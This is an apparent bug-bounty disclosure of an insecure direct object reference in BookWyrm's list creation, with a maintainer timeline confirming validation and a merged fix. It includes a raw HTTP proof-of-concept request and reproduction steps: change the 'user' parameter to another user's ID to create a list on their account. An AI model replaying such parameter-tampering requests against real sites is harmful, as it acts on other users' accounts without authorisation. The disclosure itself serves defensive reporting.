Insecure Direct Object References when creating a list in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 18th 2022


Description

Insecure direct object references when creating a list allows one user to create a new list on behalf of another.

Proof of Concept

POST /list HTTP/2
Host: bookwyrm.social
Cookie: django_language=None; csrftoken=I5lj4znBJ9B5HnT3FAsII67G1EISidIKGlsIz5ElN9kmlDwucM2hGKx0Fy4gM8vj; sessionid=kskbj9mmxksyiaqyup8tsri8zrh6x0xi
Content-Length: 158
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://bookwyrm.social
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://bookwyrm.social/user/<user1>/lists
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

csrfmiddlewaretoken=z1U84ZsGwubuTiOAGXssNXkAfZ7KbII6xh1xzvJqAuULxyr1d921LBKUTTt8FDvF&user=<user2_id>&name=testname&description=testdes&curation=closed&privacy=public

Steps to reproduce

1.Login with user1 account then go to Profile page.
2.Go to the Lists tab then create a new list.
3.Intercept the request, in the body content, change the value of user from user1_id to user2_id then forward the request.
4.You will see that a new list is create in user2 account instead of user1 account.

Impact

This vulnerability is capable of allows a user to create a list on other users' accounts, affecting the logic of the application.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 16 days ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back 15 days ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. 12 days ago
Mouse Reeve validated this vulnerability 6 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on 41b20c 6 days ago
The fix bounty has been dropped
form.html#L1-L116 has been validated
list.py#L23-L176 has been validated
create_form.html#L1-L12 has been validated
to join this conversation